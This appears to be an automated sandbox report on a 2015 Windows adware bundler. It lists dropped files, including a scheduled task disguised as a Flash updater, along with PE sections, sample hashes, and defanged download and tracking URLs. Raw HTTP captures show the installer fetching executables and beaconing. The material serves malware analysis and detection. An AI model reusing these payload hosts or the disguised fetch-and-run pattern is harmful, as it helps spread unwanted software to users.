%Documents and Settings%\%current user%\Local Settings\Temp\nso12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GJ6ZM961\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GJ6ZM961\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\vos[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssF.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst10.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmD.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbA.tmp (13911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg20.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\LRP8nPI[1].exe (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr22.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_128.exe (1188412 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi4.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M16JSLQR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu5.tmp (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GJ6ZM961\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp (7384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp25.tmp (718712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp24.tmp.exe (275838 bytes)
%WinDir%\Tasks\Adobe Flash Player Updater.job (830 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23462 | 23552 | 4.51398 | 9d64b6ac6eb1aa41e38f6cc8798b652e |
.rdata | 28672 | 4496 | 4608 | 3.59163 | f179218a059068529bdb4637ef5fa28e |
.data | 36864 | 3774424 | 1024 | 3.26654 | af685ae5a632e08acd6c90a62cdfc3bb |
.ndata | 3813376 | 1798144 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 5611520 | 1736 | 2048 | 2.02827 | da7a0b9d9567037dd7f36744d830319f |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 54
8002fc0d24128006d3d5381415ef9a4a
5787e3b1bc2fa34257cae258da777db5
6683a4b47a46d8fc259d765f6fdce9cc
e74b5a8b167fc8c7a9c396ae1a73093a
72f4a7184e46d99d5be4bfdddae0d514
b530e72eb9a095029f2e55b7305eb813
4f0cbaf64b2ebef09588dcd494daee69
5192c3af97a4752e8bd7c2909355edd7
56872bfc01badd5675c92f84b312b811
e6f4a5f15fa0073abdff4174cd6dea15
109debf147b07c65b68b5d2584df90ce
a5b36912e4ed7e7c2d48bc17ea03f9d9
d3ec96737a50aef3db9c736f2f883938
9449dffea7406c80e4dc276c922b3c8c
6875fc9e7774e2e512d01e8befd22db5
4500b18b0ca5f57fe922a113253cc36c
2f0443a8a710bc8c229112149ed4d824
8b010c94685afe127180ef030b63cf8e
fd5797de1ea0fadb3e595cd28cfbdd93
a6044e2b133e09fc416a6d11bd02ab1d
5923fba5b478bea8809513e03605780b
57b308425604a3830b81e347802bf1b9
bf6250072014b593722f7dd9b12e54f2
4d1c4e9b1e39a709e8a4900719b78b82
0acf1aa93cfa9028a4cca637074f3a37
Network Activity
URLs
URL | IP |
---|---|
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ | 54.225.244.49 |
hxxp://download-servers.com/SysInfo/Validate.exe | 95.211.189.17 |
hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe | 54.230.93.5 |
hxxp://cds.c5z6s5a3.hwcdn.net/crcb/123/installer.exe | |
hxxp://ipgeoapi.com/ | 107.21.106.96 |
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=6474 | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2429 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=951432958192de010e9b45488dbf5014&rnd=3804 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=951432958192de010e9b45488dbf5014&rnd=3707 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=951432958192de010e9b45488dbf5014&rnd=3065 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.004 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.002 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.001 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.003 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/107/ie.zip.005 | |
hxxp://drz432f7yeokb.cloudfront.net/prepreinstaller_win.exe | 216.137.61.180 |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=951432958192de010e9b45488dbf5014&rnd=5632 | |
hxxp://drz432f7yeokb.cloudfront.net/SilentInstaller_dotnet4.exe | 216.137.61.180 |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=951432958192de010e9b45488dbf5014&rnd=3775 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=106&os=XP32&browser=&campaign=003040&browserver=106&country=&error=na&action=mutex_already_exists&report=cberr&rnd=1906 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=951432958192de010e9b45488dbf5014&rnd=4473 | |
hxxp://json.lxhwspv.com/?adv_id=128&domain=LxHWSpv.com&dotnet=4&event=2&file=installer&ip=52.1.45.42:80&pub_id=353&s=1&offer_version=1.8&dotnet=4&osver=5.1&lang=en | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=951432958192de010e9b45488dbf5014&rnd=8733 | |
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=8792 | |
hxxp://djapp.info/?file=flash | |
hxxp://d22nes4susdva1.cloudfront.net/iqa/install_flash_player_ppapi.exe | 216.137.61.58 |
hxxp://ext.internetquickaccess.com/extensions/internetquickaccess/updates.php?id=pcjnhdkacfipfoicilllfabpbghiegpn&os=win&arch=x86&nacl_arch=x86-32&prod=chromiumcrx&prodchannel=unknown&prodversion=45.0.2433.0&lang=en-US&x=id=pcjnhdkacfipfoicilllfabpbghiegpn&v=0.0.0.0&uc | 108.59.81.209 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=951432958192de010e9b45488dbf5014&rnd=3775 | 54.231.1.148 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.005 | 69.16.175.42 |
hxxp://dl.staticclientstorage.com/69/all/cp/row/setup.exe | 69.16.175.10 |
hxxp://json.lxhwspv.comhxxp://json.lxhwspv.com/?adv_id=128&domain=LxHWSpv.com&dotnet=4&event=2&file=installer&ip=52.1.45.42:80&pub_id=353&s=1&offer_version=1.8&dotnet=4&osver=5.1&lang=en | |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=951432958192de010e9b45488dbf5014&rnd=3065 | 54.231.1.148 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=951432958192de010e9b45488dbf5014&rnd=3707 | 54.231.1.148 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=951432958192de010e9b45488dbf5014&rnd=4473 | 54.231.1.148 |
hxxp://mystats.rgbdomsrv.com/installer.gif?action=started&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2429 | 54.231.12.132 |
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=8792 | 69.16.175.42 |
hxxp://events.lxhwspv.comhxxp://events.lxhwspv.com/?p=cHViX2lkPTM1MyZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MTI4JmJpdmVyc2lvbj0xLjg= | |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.001 | 69.16.175.42 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=951432958192de010e9b45488dbf5014&rnd=3804 | 54.231.1.148 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.003 | 69.16.175.42 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.004 | 69.16.175.42 |
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk= | 95.211.189.16 |
hxxp://err.rgbdomsrv.com/utility.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=106&os=XP32&browser=&campaign=003040&browserver=106&country=&error=na&action=mutex_already_exists&report=cberr&rnd=1906 | 54.231.1.148 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=951432958192de010e9b45488dbf5014&rnd=5632 | 54.231.1.148 |
hxxp://www.djapp.info/?file=flash | 52.1.45.42 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/107/ie.zip.002 | 69.16.175.42 |
hxxp://www.djapp.info/?file=bundle&v=2 | 52.1.45.42 |
hxxp://livestatscounter.com/SysInfo/validator/timer.php | 95.211.189.16 |
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=6474 | 69.16.175.42 |
hxxp://dl.randkeygen.com/crcb/123/installer.exe | 69.16.175.10 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=951432958192de010e9b45488dbf5014&rnd=8733 | 54.231.1.148 |
d20ssor9owizgr.cloudfront.net | 216.137.61.211 |
www.google.com | 173.194.113.209 |
s3.amazonaws.com |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /crossbrowse/ie/107/ie.zip.001 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:07 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008912"
Last-Modified: Mon, 31 Aug 2015 08:15:12 GMT
Cache-Control: max-age=35167
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1446103867.dop018.am4.t,1446103867.cds046.am4.c
PK........l..G...nd.T.d.T.....chrome.packed.7z7z..'.....T...T.............*..F......8%D.cT(g.....,r...E^<5....S$<....Z..*...7&.o.,.a&......%...1..5...m...h..=w.|.a.a.Q.{.<..:..9Q,>n...k.....~..aJ.._...KD.V...7.>..3....d......)..6.H..RN...:.....FU.!..j...9....L.&.2.a........ .E.s'T.......vD.z)..}..-.. .&.vF}.$.z.......lw.>..!...'.a..|...L....09E..Y8^.s.O\..C..%.......d.VD....W..d.'..6%...l.7Gk.<..I...5...d !......wT...d...H..7v.E.......{.p.]`.......~w84.rj......;...).q.k..G...........zL...{....>.."........"q..k[.f...F{8...s..c>[69..|...q].(.S..~..1z..>.!AT&i.}....YJ....\i....o..(...4.5.......h|.......6.!...4.p[....@.m.. ^&...A..&E..V.]...T=.v]W.l=A=y.T....R.'f.....60..MR...k...c.1."..jw.7C.N...b....@...@....%..%*!5............iW*y..*......E...D....6....3.P....2.....} .'..!...cG.m...Z.]%{.QZ./e.V-C.a.X.aQ?.....S..1...:.T..C*..hKH....(...aH.r..;..^.l.ikR.X..8..._...^T{B@..'.tga.3."..<. ...........$c9......... .~)/..%.2{...X&.W.....>...bh.L.....U.-.Vf......r..d..9. ..k.'.M...J...v...rU..`3...SWX...G1.`....{.....8.~..x..Q...g.._...1.9.......f8..#p..............]...E.(....J....(H.h..6@'.hc.5....}.1>{..6/.R.....(X.k.<....\.....:p...u..L.....h...K...vaK./.O........'|...8..2...{..9....."&.......Z..K.eJ..4e..)v..[...J$.e........5.G......X..@.o.^Y...%....._.n.:...\......H...0,.f.E...*M.F.f.R.lJ*,...S.....FE*'b.#V.@........a=._.....W... .}.....p.~..(>.....E.1k....3k....F..[.T...,N...............Y7.......G[....rH).E......[.5..K..Q..J#8.-.@.]<eh........2a.c.8...Z....O.....z..2c
<<< skipped >>>
GET /extensions/internetquickaccess/updates.php?id=pcjnhdkacfipfoicilllfabpbghiegpn&os=win&arch=x86&nacl_arch=x86-32&prod=chromiumcrx&prodchannel=unknown&prodversion=45.0.2433.0&lang=en-US&x=id=pcjnhdkacfipfoicilllfabpbghiegpn&v=0.0.0.0&uc HTTP/1.1
Host: ext.internetquickaccess.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2433.0 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Oct 2015 07:32:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.28-1~dotdeb 7.1
Content-Encoding: gzip
df.............P.R.0.....T!.W.c9]..>@>.e.......G8.4.P\......]...\".........)8..r~x......L..jl*N/..............s:...SA.$se..t....R..Q......-....e..1.4.Q..D.B..I... \T.../....j"U...........j..W.b...........h:..^...m..=....v..G.....0..HTTP/1.1 200 OK..Server: nginx..Date: Thu, 29 Oct 2015 07:32:20 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.28-1~dotdeb 7.1..Content-Encoding: gzip..df.............P.R.0.....T!.W.c9]..>@>.e.......G8.4.P\......]...\".........)8..r~x......L..jl*N/..............s:...SA.$se..t....R..Q......-....e..1.4.Q..D.B..I... \T.../....j"U...........j..W.b...........h:..^...m..=....v..G.....0..
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4958\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:52 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4959\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:53 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4960\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:53 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:30:53 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4961\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Thu, 29 Oct 2015 07:30:53 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Thu, 29 Oct 2015 07:30:53 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..
GET /69/all/cp/row/setup.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.staticclientstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:02 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441951687"
Last-Modified: Fri, 11 Sep 2015 06:08:07 GMT
Cache-Control: max-age=905
Content-Length: 1998408
Content-Type: application/x-msdownload
X-HW: 1446103863.dop004.fr7.t,1446103862.cds030.fr7.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..S............F.>.%...F.......F...Z.....e...............b.C...o.K.......r.......................:.......v.......?.....Rich............PE..L...&L.U............................./.......0....@..................................x....@................................. I...........A...........v..H............3..8...............................@............0...............................text...T........................... ..`.rdata..j*...0...,..................@..@.data....0...`.......F..............@....rsrc....A.......B...0..............@..@.reloc...............r..............@..B........................................................................................................................................................................................................................................................................................................................U...M.V3.;.tb.A.;.t[.p..q..q..q..P.;.t.....Q0..0....0.p..p..p .p8.p<.@......Hl.HP.HL....................3.^]........^]..........U...M.3.;.t..A.;.t.Q.P(.P,.P0.^...]........]....U...M.W..tt.y...tmSV.u...y.3..........C..0}......t....|....~.^[....._]....G4..t.9w$t.P.A(.I$P...M.....G4....Q._..w$.X...^[_]........_]..........U...E.S3.;........81.......}.8......V.u.;.u.^.C.[]....^.9^ u..F ` @..^(9^$u..F$. @..F(.N Wh....j.P.......;.u._^.....[]....U.R.~.V._4.........t..F(.N$WP......F....._^..[]........[].......
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.005 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:07 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=35166
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1446103867.dop001.am4.t,1446103867.cds046.am4.c
[..Wa<.3.......Y.}S.Q)|.x.P..r._ip`...h.r...@..k.....8..o.D_C.0.h..M...gv......J..g.....a.4..~....A.Y.. .u:7..... i...$.....p...ORP.P... ....._.@......?.F.....8.@..l....{n...XGi......2..........FOqM..N_.}...S*he.I.q.. ..V...=.E....1....M.S.......f3%.?.....Ug.\.}...I..g..w..[....t..yR..DJ3.;.;W...._.....y.:..XZ<..40a.I..A...vUW..,...u"......>..*.....@D...YX.4.......v]...T.$..T.1...2.X..o.X....@.%...n.LL....-..A...n.......uq<.r$..t`M.:c9C..l./....}2.......{.O...7............;...M..x...rwqL.\.. ..b.........*f!..S|..*g...'dl..........eN..km...:.6.....s....n.5..0_r8 D.W...".S/%r.rU..c.......C.v5..C...3..z....\.B.-a..r......|..G..W.....2h..>jSy....Z.........tE...T....R.2...p..Q>...f.fj.#.Z.l....7..h.....>...-..K...<....?....B..........,.....$..~........^..V...Uq.672kCC......i....J....*...K.......0..14....{.Wwf".K.p....;.6.H."6y.q.E~. i.`...hN.....d../\A....hY.$!}3..7.*&.n......Z...Q>W.......`0.q..M..A@*.Y 0..7l"m......0...4..X2.|.C2j.[..K...gu...?.a..s.B.kX......j.t...B@|d.l._.zZ.. ."D(..PD..l?.%..w.....).v,v9m...w........G..C.SU.l7*JlW.....56.....v..{............G..3..0....R......Y.h,u..k.'.....$..&.[.9.. 8..1..DZF....n......l_.......*.R...Q$.3.q\..'...]...k..*..0....^#.|A.v...K...........T.Q.#...^e.c....V\..ysD.Ai^.ly..P.~..lreD.g_.Q.....i..kS.R...f..=9.9..q=D."......-N...C.....%.-..u.....<.qj..:..s......:>.I`.PJ..vQ.K.....o.)qew.K.G....w.....tJ.a4...L.[.......0.0#.),......7....J}*..^`w..Q.h...~e..Ql..*..|}...K.Z.*..'.....|..rp.@_.b..!..R.%....%..m"....W9..$ 1.......VZ..''.1,|..V...
<<< skipped >>>
GET /utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=951432958192de010e9b45488dbf5014&rnd=3804 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: owm0A2VwZ fAFZKdHlPUMgyuVXafcVEThIOwANcVoEmR4HNOqR6N29k/X6 4LTFJ
x-amz-request-id: 2E1F56F7DA07770A
Date: Thu, 29 Oct 2015 07:31:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=951432958192de010e9b45488dbf5014&rnd=3707 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: P1UZDwwwBu7nUGDwaryzAhOZ9BlDOflYpb4RhLXY8AFbo0blfvjlHLos7XemjSBb
x-amz-request-id: 895C0BB43350E31C
Date: Thu, 29 Oct 2015 07:31:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=951432958192de010e9b45488dbf5014&rnd=3065 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: ubBXAo6TlDsVKZu70Xqt5Z pbJvHGa1nD4h0k1clEbbm39oJgJpdMS59P9xZNFka
x-amz-request-id: 3F474E13F6253A81
Date: Thu, 29 Oct 2015 07:31:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: ubBXAo6TlDsVKZu70Xqt5Z pbJvHGa1nD4h0k1clEbbm39oJgJpdMS59P9xZNFka..x-amz-request-id: 3F474E13F6253A81..Date: Thu, 29 Oct 2015 07:31:08 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=951432958192de010e9b45488dbf5014&rnd=5632 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: k5bIf0I8TsFZu J4ql XPkz4iMrFrbXgTVyem4Nq5fEqJZ9 b7w5MzJAeIerNVm
x-amz-request-id: 2A77CADFFF654825
Date: Thu, 29 Oct 2015 07:31:15 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
